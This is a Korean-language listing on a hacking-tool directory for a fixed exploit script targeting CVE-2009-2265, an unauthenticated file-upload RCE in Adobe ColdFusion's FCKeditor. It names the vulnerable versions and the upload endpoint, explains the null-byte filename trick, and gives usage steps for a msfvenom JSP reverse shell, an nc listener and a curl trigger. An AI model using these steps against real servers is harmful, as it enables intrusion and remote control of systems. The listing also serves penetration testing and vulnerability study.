Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2009-2265-fix — exploitdb에서 작동하지 않는 익스플로잇 스크립트(50057.py)에 대한 수정 | Kitploit
도구/GitHubGitHub/hd-exe/cve-2009-2265-fix
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubhd-exe/cve-2009-2265-fix

CVE-2009-2265-fix

exploitdb에서 작동하지 않는 익스플로잇 스크립트(50057.py)에 대한 수정

저장소 보기
13시간 32분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2009-2265 - Adobe ColdFusion RCE

ColdFusion에 번들로 포함된 FCKeditor 컴포넌트의 임의 파일 업로드를 통한 인증되지 않은 원격 코드 실행. 파일 업로드 엔드포인트는 filename 파라미터에서 널 바이트 주입을 허용하여, JSP 웹셸을 업로드하고 서버에서 직접 실행할 수 있게 한다.

취약한 버전

VersionStatus
ColdFusion 8.0Vulnerable
ColdFusion 8.0.1Vulnerable
ColdFusion 9.0Vulnerable*
ColdFusion MX 6.xVulnerable
ColdFusion MX 7.xVulnerable
ColdFusion 9.0.1+Patched
ColdFusion 10+Not affected

*ColdFusion 9.0은 FCKeditor 컴포넌트가 제거/업데이트되지 않은 경우 취약함.

패치: Adobe Security Bulletin APSB09-09 (2009년 7월).

사용법

스크립트 상단의 변수를 편집한다:

root@kitploit:~
lhost = 'YOUR_IP'
lport = 4444
rhost = 'TARGET_IP'
rport = 8500

실행:

root@kitploit:~
python3 poc.py

스크립트는 다음을 수행한다:

  1. msfvenom을 통해 JSP 리버스 셸을 생성
  2. FCKeditor 엔드포인트를 통해 대상에 업로드
  3. lport에서 nc 리스너 시작
  4. 셸을 자동으로 트리거

셸이 몇 초 내에 도착하지 않으면 수동으로 트리거한다:

root@kitploit:~
curl http://<rhost>:<rport>/userfiles/file/<filename>.jsp

파일 이름은 업로드 후 stdout에 출력된다.

요구 사항

root@kitploit:~
msfvenom
netcat (nc)
python3

취약한 엔드포인트

root@kitploit:~
/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm

참고 사항

  • 기본 ColdFusion 포트는 8500 (HTTP) 또는 8300 (HTTPS)
  • 업로드된 파일은 /userfiles/file/에 저장됨
  • CurrentFolder 파라미터의 널 바이트(%00)는 파일 이름을 잘라내어, 업로드가 .txt로 보이더라도 서버가 파일을 .jsp 확장자로 저장하게 함
  • Windows 대상에서는 셸이 cmd.exe가 되고, Linux에서는 /bin/sh가 됨
도구 다운로드